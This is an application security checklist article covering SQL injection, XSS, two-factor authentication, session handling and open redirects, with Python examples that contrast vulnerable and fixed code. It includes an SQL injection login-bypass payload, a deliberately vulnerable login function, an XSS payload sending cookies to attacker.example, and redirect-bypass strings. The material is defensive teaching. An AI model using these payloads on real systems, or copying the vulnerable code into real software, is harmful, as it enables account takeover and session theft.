Application Security Checklist and Strategy for 2023

Parveen Bhandari | 15 March 2023

Introduction to Application Security

Application security describes the measures taken at the application level to protect an application's code and data from theft or tampering. Most of this work happens during design and development, but it continues after the application is deployed, and it involves multiple systems and approaches. Application-level security may combine hardware, software and procedures that identify or reduce vulnerabilities.

Organizations are now aware of application security, and many tools exist to safeguard applications against coding flaws, evaluate encryption options, manage access rights and audit application permissions. The earlier you find an issue, ideally during design or development, the sooner and more cheaply you can fix it and the safer you are. Making mistakes is natural; identifying them promptly is the real challenge.

"Every organization scans its infrastructure, applications, and even culture for vulnerabilities, which can be found in areas such as configuration, code syntax, or frontline awareness and training." (McKinsey, The risk-based approach to cybersecurity)

What is Application Vulnerability?

An application vulnerability is a defect that could be exploited to compromise the security of the application. Such attacks target the confidentiality and integrity of the resources the application holds and of its users. This article lists the points you should take care of when securing your applications, and we cannot stress enough how important that is. Let us get started with the application security vulnerabilities checklist.

Application Security Checklist

Application Security Vulnerability

SQL Injection

  • SQL injection is a technique that uses malicious SQL code to manipulate the backend database; it can also be used to destroy it.
  • It is a vulnerability that may affect any web application or website backed by an SQL database such as SQL Server, Oracle, MySQL, etc.
  • Attackers use SQL injection to read the credentials of other users stored in the database.
  • Using SQL injection, an attacker can alter data in the database, i.e. delete, update or insert rows.
Example -
  • You have created a table 'users' with the CREATE TABLE command.
  • The table users has the following fields: id, email, password.
  • Normally the login code runs a query such as SELECT * FROM users WHERE email = '<email>' AND password = md5('<password>'); with the two values copied straight from the login form.
  • An attacker enters xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- (with a trailing space) as the email, so the query the database actually receives is: SELECT * FROM users WHERE email = 'xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' AND password = md5('1234');
  • OR 1 = 1 is a condition that is always true, and LIMIT 1 returns the first matching row.
  • -- starts an SQL comment, so everything after it on the line, including the AND password = ... check, is ignored by the database, and the attacker is logged in as the first user in the table without knowing any password.

Prevent SQL injection

  • Use prepared statements (parameterized queries), so that user input is bound as data and never parsed as SQL.
  • Do not reveal sensitive information, such as query text or database error details, in error messages.
  • Use a web application firewall as an additional layer, not as the primary control.
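
The query from the example above, as an added illustration that is not part of the original article: a login function that builds the SQL string from the form fields next to the same login written with a prepared statement, run against a constructed in-memory SQLite table. The table contents, the `example.com` addresses and the function names are assumptions for this example only, and the plain SHA-256 stands in for the article's `md5()` purely to keep the query shape identical (neither is an acceptable password store; see the cryptographic storage section).

```python
import hashlib
import sqlite3

# Constructed sample data for this example: two users in an in-memory SQLite table.
# Hashing with plain SHA-256 mirrors the article's md5('1234') and is NOT a suitable
# password store; passwords need a salted, slow hash.
SAMPLE_USERS = [
    (1, "admin@example.com", hashlib.sha256(b"s3cret").hexdigest()),
    (2, "alice@example.com", hashlib.sha256(b"1234").hexdigest()),
]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, email, password):
    """Vulnerable: the form values are pasted into the SQL text, so a quote,
    OR 1 = 1 and -- typed into the email field become part of the query."""
    pw_hash = hashlib.sha256(password.encode("utf-8")).hexdigest()
    query = ("SELECT id, email FROM users WHERE email = '%s' AND password = '%s'"
             % (email, pw_hash))
    return conn.execute(query).fetchone()


def login_safe(conn, email, password):
    """Prepared statement: the '?' placeholders bind the values as data; the SQL
    structure is fixed before any user input is seen, so the same payload is
    simply compared against the email column and matches nothing."""
    pw_hash = hashlib.sha256(password.encode("utf-8")).hexdigest()
    return conn.execute(
        "SELECT id, email FROM users WHERE email = ? AND password = ?",
        (email, pw_hash),
    ).fetchone()


if __name__ == "__main__":
    db = build_db()
    payload = "xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- "  # the article's email-field payload
    print("vulnerable:", login_vulnerable(db, payload, "wrong-password"))  # (1, 'admin@example.com')
    print("safe:      ", login_safe(db, payload, "wrong-password"))        # None
```

The vulnerable version returns the first row of the table (the admin account) for any password; the parameterized version returns nothing for the payload and only succeeds with a real email and password pair.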

Secure Your Password

  • Choose a password manager without master-password recovery - If an attacker can obtain the master password through an account recovery feature, even the most secure password manager becomes useless.
  • Use two-factor authentication to protect the password manager - 2FA is a login process that requires users to present a second proof that they are who they claim to be, in addition to the password.
  • Turn off autofill, so that a malicious page cannot silently harvest credentials.
  • Use strong passwords.
  • Use a unique password for every site, so that one breach does not expose other accounts.

Cross-Site Scripting (XSS) in Application Security Vulnerability

  • A type of security vulnerability found in web applications.
  • It is a common attack vector that injects malicious code into a vulnerable web application.
  • It allows an attacker to execute malicious JavaScript (JS) in the victim's browser, in the context of the vulnerable site.
  • The actual attack occurs when the victim visits the web application or page that returns the malicious code.
  • Types of XSS - Persistent (stored) XSS, Reflected XSS, DOM-based XSS.

Persistent XSS

  • The attacker uses one of the website's forms to insert a malicious string into the website's database.
  • The victim requests a page from the site.
  • The website includes the malicious string from the database in the response and sends it to the victim.
  • The victim's browser executes the malicious script inside the response, which sends the victim's cookies to the attacker's server.

Reflected XSS

  • The attacker crafts a URL containing a malicious string and sends it to the victim.
  • The attacker tricks the victim into requesting the URL from the website.
  • The website reflects the malicious string from the URL into its response.
  • The victim's browser executes the malicious script inside the response, which sends the victim's cookies to the attacker's server.
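
The reflected case above, as an added example that is not part of the original article: a server-side search page that echoes the `q` parameter, rendered three ways. The payloads, the `attacker.example` host and the function names are constructed for this example. It goes slightly beyond the text by showing that escaping only `<`, `>` and `&` is not enough when the value also lands inside an HTML attribute.

```python
import html

# Constructed payloads for this example, not captured traffic.
SCRIPT_PAYLOAD = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_vulnerable(query):
    """Reflects the ?q= parameter straight into an HTML body and an attribute."""
    return f'<p>Results for: {query}</p>\n<input name="q" value="{query}">'


def render_half_fixed(query):
    """Escapes < > & only: stops <script> in the body, but a quote still closes
    the value="..." attribute, so an event-handler payload still executes."""
    safe = html.escape(query, quote=False)
    return f'<p>Results for: {safe}</p>\n<input name="q" value="{safe}">'


def render_safe(query):
    """Escapes < > & and both quote characters, so the input stays inert in
    both contexts. Output encoding must match the context the data lands in."""
    safe = html.escape(query, quote=True)
    return f'<p>Results for: {safe}</p>\n<input name="q" value="{safe}">'


def attribute_injected(page):
    """Crude check used by this example: did the payload escape value="..."
    and smuggle in its own onfocus handler?"""
    return 'onfocus="' in page


if __name__ == "__main__":
    for name, render in [("vulnerable", render_vulnerable),
                         ("half-fixed", render_half_fixed),
                         ("safe", render_safe)]:
        print(f"--- {name} ---")
        print(render(SCRIPT_PAYLOAD))
        print(render(ATTRIBUTE_PAYLOAD))
```

The same principle applies on the client: DOM-based XSS is avoided by assigning untrusted data with `textContent` rather than `innerHTML`, and a `Content-Security-Policy` plus `HttpOnly` cookies limit what a script that does slip through can do.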

Two-Factor Authentication in Application Security Vulnerability

  • Provides an additional layer of security against unauthorized access to an account.
  • The method requires more than one piece of information for a successful login.
  • In addition to the username and password, 2FA requires the user to enter additional information such as a one-time password (OTP), i.e. a six-digit verification code.
  • This verification code is a time-based one-time token that can be generated by an authenticator app such as Google Authenticator.
  • No internet connection is required to generate these tokens: they are derived from a secret shared at enrolment and the current time.
  • A new token is produced every 30 seconds.
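
How those 30-second, six-digit tokens are computed and checked, as an added example that is not part of the original article: the HOTP/TOTP algorithm (RFC 4226 / RFC 6238, the scheme authenticator apps implement) with the server-side verification step. The secret is the published RFC reference secret used as constructed test data; the function names, the drift window and the replay guard are design choices of this example.

```python
import base64
import hashlib
import hmac
import struct
import time

# RFC 4226 / RFC 6238 reference secret ("12345678901234567890"), used here as
# constructed test data. Authenticator apps receive the secret base32-encoded
# in the enrolment QR code.
REFERENCE_SECRET = b"12345678901234567890"
REFERENCE_SECRET_BASE32 = base64.b32encode(REFERENCE_SECRET).decode("ascii")


def hotp(secret, counter, digits=6):
    """HMAC-based one-time password (RFC 4226): HMAC-SHA1 over the 8-byte
    big-endian counter, dynamic truncation to 31 bits, reduced to `digits`."""
    msg = struct.pack(">Q", counter)
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, for_time=None, step=30, digits=6):
    """Time-based OTP (RFC 6238): HOTP with counter = unix_time // step, which
    is why the code changes every 30 seconds and needs no network."""
    if for_time is None:
        for_time = time.time()
    return hotp(secret, int(for_time // step), digits)


def verify_totp(secret, code, for_time=None, step=30, window=1, last_counter=-1):
    """Server-side check. Accepts +/- `window` steps of clock drift, compares
    in constant time, and refuses any counter <= last_counter so a code that
    was already used cannot be replayed within its validity period.
    Returns the accepted counter (persist it as the new last_counter) or None."""
    if for_time is None:
        for_time = time.time()
    now = int(for_time // step)
    for counter in range(now - window, now + window + 1):
        if counter <= last_counter:
            continue
        if hmac.compare_digest(hotp(secret, counter, len(code)), code):
            return counter
    return None


def secret_from_base32(encoded):
    """Decode the secret as shared with the authenticator app (tolerates
    lowercase, spaces and missing '=' padding, as enrolment strings often do)."""
    cleaned = encoded.strip().replace(" ", "").upper()
    cleaned += "=" * (-len(cleaned) % 8)
    return base64.b32decode(cleaned)


if __name__ == "__main__":
    print("secret for the app:", REFERENCE_SECRET_BASE32)
    print("current code:", totp(REFERENCE_SECRET))
    print("RFC 6238 vector (t=59):", totp(REFERENCE_SECRET, for_time=59))  # 287082
```

The `last_counter` argument is the part most home-grown implementations forget: without it, a code phished or shoulder-surfed seconds ago still works until its 30-second step (plus the drift window) expires.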

Distributed denial of service (DDoS)

  • It is a cyber attack on a specific server or network.
  • A DDoS attack comes from many sources at once.
  • By using malicious software, the attacker gets machines on other networks to take part in the attack.
  • The attack is meant to shut down a machine or service, making it inaccessible to its users.
  • Botnet - A botnet is an army of infected computers used to mount a DDoS attack.
  • The attacker writes a malware program and distributes it over the internet, e.g. through compromised websites and email attachments.
  • If a user visits one of these websites or opens such an attachment, the malware is installed on the computer without the owner knowing that it is infected.
  • The computer is then ready to take part in a DDoS attack.
"Running penetration tests on software early in the development process is one way to thwart holes that enable L7 DDoS attacks." (from the article DevSecOps Tools and Continuous Security)

Insecure Cryptographic Storage in Application Security Vulnerability

  • A vulnerability that occurs when sensitive data is not properly protected, i.e. not appropriately encrypted or hashed.
  • Sensitive data includes usernames, passwords, credit card information, etc.
  • Reasons for insecure storage include improper key storage and management, using weak algorithms, incorrect use of encryption, etc.
  • Such unsafe storage can lead to loss of sensitive information.
Preventing Insecure Cryptographic Storage
  • Use standard, well-reviewed methods for encryption.
  • Do not design your own encryption algorithms.
  • Use known secure encryption algorithms and modes.
  • Ensure that stored data is not easy to recover: passwords in particular should not be encrypted at all but stored as salted hashes computed with a deliberately slow algorithm, so that a leaked database does not reveal them.
  • If using asymmetric encryption, be sure to store private keys securely and carefully.

Broken Authentication and Session Management

Websites typically create a session cookie carrying a session ID for each valid session. The cookie should hold only an opaque, randomly generated identifier; it should never contain sensitive data such as the username or password. Whenever a session ends, whether the browser is closed abruptly or the user logs out, the session must be invalidated on the server and a fresh ID issued for the next session. If old IDs are not invalidated, or if an ID issued before login is kept after login, an attacker who has obtained or planted that ID can keep using the session. Therefore, check the strength of authentication and session management: keys, session tokens and cookies should be adequately implemented without exposing passwords.
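
A minimal server-side session store illustrating the points above, added as an example that is not part of the original article: the cookie carries only a random identifier, sessions expire, logout invalidates them, and the ID is rotated at login so a pre-login ID cannot be reused. The class name, the in-memory dictionary, the 30-minute default and the injectable clock are choices of this example.

```python
import secrets
import time


class SessionStore:
    """Server-side sessions keyed by an opaque random ID. Nothing about the user
    is stored in the cookie itself, so there is nothing for an attacker to read
    or forge; the cookie is only a lookup key into this store."""

    def __init__(self, ttl_seconds=1800, clock=time.time):
        self.ttl = ttl_seconds
        self.clock = clock          # injectable so expiry can be tested offline
        self._sessions = {}         # session_id -> {"user": ..., "expires": ...}

    def create(self, user):
        sid = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG: unguessable
        self._sessions[sid] = {"user": user, "expires": self.clock() + self.ttl}
        return sid

    def get_user(self, sid):
        """Return the user for a live session, or None. Expired entries are
        dropped on access so a stale ID is never honoured."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if self.clock() >= entry["expires"]:
            del self._sessions[sid]
            return None
        return entry["user"]

    def rotate(self, sid):
        """Issue a fresh ID and retire the old one. Call this the moment a user
        authenticates (or changes privilege) to defeat session fixation."""
        user = self.get_user(sid)
        if user is None:
            return None
        del self._sessions[sid]
        return self.create(user)

    def invalidate(self, sid):
        """Logout: forget the session server-side, not just clear the cookie."""
        self._sessions.pop(sid, None)


def cookie_header(sid):
    """Set-Cookie value with the flags a session cookie should carry:
    HttpOnly (no script access), Secure (HTTPS only), SameSite (CSRF mitigation)."""
    return f"session={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    store = SessionStore()
    anonymous = store.create("guest")
    logged_in = store.rotate(anonymous)           # login: old ID is now dead
    print("Set-Cookie:", cookie_header(logged_in))
    print("old id valid:", store.get_user(anonymous))   # None
    store.invalidate(logged_in)                   # logout
    print("after logout:", store.get_user(logged_in))   # None
```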

Consider Relevant Tools for Application Security Vulnerabilities

Choosing the right tool helps you find vulnerabilities. The tool you choose should be able to meet the objectives of the project; whether paid or freely available, it must be relevant to your security testing needs. Tools detect loopholes and ease the process, but they will not meet all your objectives on their own.

Recheck the vulnerabilities reported

Once results are out after security testing, it is essential to validate the findings and cross-check whether they really exist. This way, reported flaws are verified against the required context, which saves time and effort in the long run and instills the much-needed confidence in the testing process.

Unvalidated Redirects and Forwards

Web applications use various methods to forward and redirect to other pages, so the target of every forward and redirect must be properly validated. If the destination is not validated, attackers can abuse the redirect to send victims to phishing or malware sites, or use forwards to reach unauthorized pages.
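
A validator for the redirect target, added as an example that is not part of the original article. It accepts only same-site paths or absolute URLs whose host is on an allow-list, and it goes a little beyond the text by handling the common bypass forms (scheme-relative `//host`, backslash variants, `javascript:` URLs, and `user@host` tricks). The `app.example` and `evil.example` hosts and the function names are assumptions for this example.

```python
from urllib.parse import urlparse

# Constructed allow-list for this example.
ALLOWED_HOSTS = {"app.example", "www.app.example"}


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """Accept only:
      - a path-absolute same-site target such as '/account', or
      - an http(s) URL whose hostname is on the allow-list.
    Everything else, including scheme-relative '//evil', 'javascript:' and
    'https://app.example@evil.example', is rejected."""
    if not target:
        return False
    # Browsers treat '\' like '/' in URLs and strip CR/LF/TAB/NUL; refuse them
    # outright rather than trying to normalise what the parser does not.
    if any(ch in target for ch in "\\\r\n\t\x00"):
        return False
    parts = urlparse(target)
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative URL: require http(s) and an allowed host.
        # urlparse() puts the part after '@' in .hostname, so the userinfo
        # trick resolves to the attacker's host and fails the check.
        if parts.scheme not in ("http", "https"):
            return False
        return (parts.hostname or "").lower() in allowed_hosts
    # Relative target: must start with exactly one '/', not '//' (which the
    # browser would read as a scheme-relative URL to another host).
    return target.startswith("/") and not target.startswith("//")


def resolve_redirect(target, allowed_hosts=ALLOWED_HOSTS, default="/"):
    """What the login handler should actually send in the Location header:
    the requested target if it passes, otherwise a fixed safe default."""
    return target if is_safe_redirect(target, allowed_hosts) else default


if __name__ == "__main__":
    for candidate in ["/account", "//evil.example/", "https://evil.example/",
                      "https://app.example@evil.example/", "javascript:alert(1)",
                      "/\\evil.example", "https://app.example/dashboard"]:
        print(f"{candidate!r:45} -> {resolve_redirect(candidate)}")
```

Forwards (server-side dispatch to another handler) are validated the same way, but against the application's own route table rather than a host list; the safest pattern for both is to pass an index into a fixed list of allowed destinations rather than a URL at all.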

An Approach to Application Security

A continuous security monitoring approach gives enterprises real-time insight into their security posture and helps them continually watch for cyber attacks. To facilitate this approach we advise taking the following steps -